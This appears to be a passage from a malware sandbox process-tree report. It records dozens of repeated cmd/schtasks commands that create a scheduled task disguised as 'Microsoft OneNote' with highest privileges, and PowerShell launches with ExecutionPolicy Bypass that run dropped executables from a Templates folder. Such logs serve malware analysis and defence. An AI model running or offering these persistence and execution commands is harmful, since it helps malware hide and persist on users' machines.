C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4784
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4976
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:764
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1680
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:836
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2436
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:180
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4652
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2636
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4572
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4784
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3164
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:5112
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4968
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4972
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:916
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4356
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2884
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3144
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2112
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2760
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2804
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2376
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2368
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3988
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4460
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ejqcuqc5.3cz.exe"' & exit2⤵PID:3408
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ejqcuqc5.3cz.exe"'3⤵
- Command and Scripting Interpreter: PowerShell
PID:3880 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ejqcuqc5.3cz.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ejqcuqc5.3cz.exe"4⤵
- Executes dropped EXE
PID:1616
-
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3240
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3856
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1028
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1216
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3044
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:5008
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4320
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:3496
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4500
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4636
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4284
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1032
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1112
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1868
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4572
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4236
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4448
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1524
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1028
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\0dugm2zh.vlg.virus"' & exit2⤵PID:2872
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\0dugm2zh.vlg.virus"'3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:4416
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3988
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3376
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4464
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3384
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2448
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1524
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1040
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1688
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2252
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2476
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2792
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:440
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4416
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1664
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1040
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:848
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1440
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4816
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2792
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4536
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4060
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:404
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1664
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1976
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:396
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1712
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4460
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:512
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:640
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:780
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3660
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2324
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2424
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1868
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1912
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2088
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3100
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4696
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3624
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:764
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1244
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4044
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3600
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1360
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4948
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3128
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2748
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2424
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2420
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1912
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1564
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3100
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1500
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4116
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4080
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1100
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1732
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:412
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3560
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3848
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2572
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1484
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4152
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:768
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4788
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3408
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:216
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:780
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3064
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:536
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4836
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1876
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3544
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2436
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4800
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1896
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1116
-
-
-
